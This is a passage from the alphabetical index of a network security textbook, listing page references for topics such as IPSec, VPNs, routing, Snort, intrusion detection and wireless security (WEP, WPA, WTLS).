intrusion detection, 7-8
definitions, 373
techniques, 378-379
technologies, 378-379
Intrusion Detection, 371-373
Intrusion Detection System, 371
Also see: IDS
Intrusion Detection Systems
See: IDS
IP, 36-39
address classes, 38-39
datagram, 65-68
private addresses, 39
security, 301-302
special-function addresses, 39
IP Policy Agent, 345-346
IP Security Policy and Security Association, 345-346
IP Security Protocol (IPSec), 341
IPSec, 341, 344-346
AH implementation, 312
and NAT, 346-347
components, 345-346
configuring a response, 329-331
configuring options, 333-334
custom policies, 312-317
driver, 345-346
full session, 336-337
implementing, 303-304, 323-324
modes, 302-303
policies, 306-307
Transport Mode, 346
Tunnel Mode, 346
IPSec ESP payload, 351-352
IPSec-enabled operating systems, 340
IPSec-enabled routers and firewalls, 340
K
key exchange, 344-345
key length, 353
keys, 302
Kismet, 527
L
L2TP, 341, 343, 351-352
LAN, 309-312
LAN-to-LAN routing, 110-111
LAN-to-WAN routing, 112-114
Layer 2 Forwarding Protocol (L2F), 341-342
Layer 2 Tunneling Protocol (L2TP), 341
LEAP, 529-530
link state routing, 122-123
Local Area Network
See: LAN
log, 416-418
log priority, 146
logging, 145-146
ACL, 149-151
anti-spoong, 150
buffered, 147-148
configuring, 147-149
console, 147
syslog, 148-149
terminal, 148
VTY, 150-151
M
MAC, 15
man-in-the-middle attacks, 341-342
management tools, 345-346
Mandatory Access Control, 15
Also see: MAC
MD5, 353
metric, 120-124
Microsoft Management Console
See: MMC
microwave systems
satellite, 455-456
terrestrial, 454
microwave wireless media, 454
misuse, 373
misuse detection, 373
MMC, 304-306
customized configuration, 307
multicast, 44-45
N
NetStumbler, 513-514
network, 33-34
network defense, 2
Network Monitor, 52-58
Display view, 54-55
filters, 55-57
network security
five key issues, 3-5
network sensor, 375-376
network tap, 376
network-based design, 388
distributed, 389-390
traditional, 388-389
network-based intrusion detection, 387-388
non-repudiation, 3-5
O
OmniPeek Personal, 515-516
captures, 517-520
live captures, 521
Open Systems Interconnection
See: OSI
operating modes, 97
operational audit, 24
OSI model, 34-36
outside threats
detecting, 394-395
P
packet, 34-36
packet filter, 134-135
packet filtering, 9
packet fragmentation, 74-75
PAP, 352-353
pass, 416-418
passive open connection, 48-50
passive threat, 5-6
Password Authentication Protocol, 352-353
Also see: PAP
passwords, 22
PEAP, 531-532
perimeter security, 9
PING capture, 76-78
plaintext, 302
Point-to-Point Tunneling Protocol (PPTP), 341
ports, 50-52
PPTP, 341, 342-343, 351-352
pre-configured rules, 425-426
prevention, 371
profile, 393-394
promiscuous mode, 58-59
protocol, 33-36
Q
QoS, 461
R
radio, 457-459
real-time analysis, 391-392
remote access, 338
remove unneeded services, 132-133
Request For Comments
See: RFC
Request-and-Respond
policy, 325-326
session analysis, 326-327
Request-only
session analysis, 324-325
response, 371
RFC, 36
RIP, 124-125
RIPv2, 125-127
routed protocols, 119
router, 42-43
access passwords, 99-100
accessing, 96-97
banners, 101
navigating, 98
user accounts, 100-101
routing, 42-43
process, 114-116
protocols, 119, 120-124
Routing Information Protocol
See: RIP
RSA SecureID token, 18-19
Rule Header, 416-418
Rule Options, 418-419
rule set
testing, 421
ruleset
examples, 419-420
S
SA, 344-345
Secure Server policy, 306-307, 309-312
Secure Shell, 342
Also see: SSH
security, 46-47
Security Association, 344-345
Also see: SA
Security Association API, 345-346
security audit, 24-25
security auditing
basics, 23-24
security policies, 306-307
security protocols, 341
security threats, 5-6
security vulnerabilities, 373
sequence numbers, 47
server, 33-34
Server policy, 306-307
Service Set Identifier, 465
Also see: SSID
session teardown process, 64-65
SHA-1, 353
Shiva Password Authentication Protocol, 352-353
Also see: SPAP
Short Message Service, 459-460
Also see: SMS
signature analysis, 392
Simple Network Management Protocol
See: SNMP
site surveys, 512
small services, 131
SMS, 459-460
SNMP, 96-97
Snort, 404
architecture, 405-406
as a packet sniffer, 410-411
as an IDS, 415
deploying, 404
function, 404-405
installing, 406-408
logging with, 414
Socks v5, 342
software tokens, 19
Software-based VPN applications, 339-340
source routing, 130
spread spectrum technology, 457-458
SSH, 103, 342
client configuration, 106-107
router conguration, 103-106
verification, 105
SSID, 465
static routing, 116-118
statistical analysis, 393-394
subnet mask, 40-42
subnetting, 40-42
surveillance monitoring, 397
syslog logging, 148-149
T
TCP, 46-47
connections, 63-64
flags, 47
headers, 70-72
TCP/IP model, 33-34
Telnet
granting, 141
Temporal Key Integrity Protocol, 506
Also see: TKIP
terminal logging, 148
three-way handshake, 46-47
Time-based Tokens, 18-19
timestamp, 147
TKIP, 506
topology, 121
traceroute, 129-130
training, 9
transit network, 340
Transport mode, 302-303
AH, 303
ESP, 303
Trojan Horse, 50-52
true-negative, 373-375
true-positive, 373-375
tunnel, 340
protocols, 340
Tunnel mode, 302-303
AH, 303
ESP, 303
tunneled data, 340
tunneling protocols, 341
U
UDP, 46-47
UDP headers, 73-74
unicast, 44-45
V
Variable Length Subnet Masking
See: VLSM
VLSM, 43-44
VPN
client, 340
client software, 340
configuring, 354-359
connection, 340
dedicated gateways, 340
design and architecture, 348
elements, 340
gateway, 346-347
implementation challenges, 348-349
security, 350
server, 340
types, 339-340
VPN fundamentals, 337
VPNs
and firewalls, 351-352
VTY logging, 150-151
VTY password, 100
vulnerability scanners, 373
W
WAP, 462-464
war driving, 489
WEP, 494-501
conguring, 501-504
cryptography, 494-495
decrypting, 523-526
key lengths, 495-496
process, 496-498
weaknesses, 498-501
WEPCrack, 527
Wi-Fi Protected Access, 507-509
Also see: WPA
wildcard mask, 136-138
Wired Equivalent Privacy, 494-501
Also see: WEP
Wireless Access Points, 448-449
Wireless Application Protocol, 462-464
Also see: WAP
wireless auditing, 512-513
Wireless Markup Language, 462-464
Also see: WML
wireless media, 451-457
infrared, 453-454
radio, 457-459
wireless network cards, 449
Also see: WNICs
wireless networking
access points, 448-449
equipment, 448-451
wireless networks
antennas, 449-451
association, 451
identifying, 514-515
microwave technology, 454
trusted, 528
Wireless Transport Layer Security, 491-493
Also see: WTLS
Wireshark, 513
GUI, 59-63
WLANs
ad-hoc mode, 466-467
APs, 465
associations, 466
authentication, 466
denial of service attacks, 490
essentials, 465
gaining access, 489-490
infrastructure mode, 467-468
threats, 488-490
topologies, 466-468
WML, 462-464
WNIC chipsets, 513
WNICs, 449
WPA, 507-509
configuring, 509
hardware requirements, 508
process, 507-508
supplicants, 509-511
vs. WEP, 508-509
WTLS, 491-493
Alert Protocol, 493
Application Protocol, 493
authentication, 491
Change Cipher Specific Protocol, 493
components, 491
handshake protocol, 491-493
origins, 491
X
x-cast, 44-45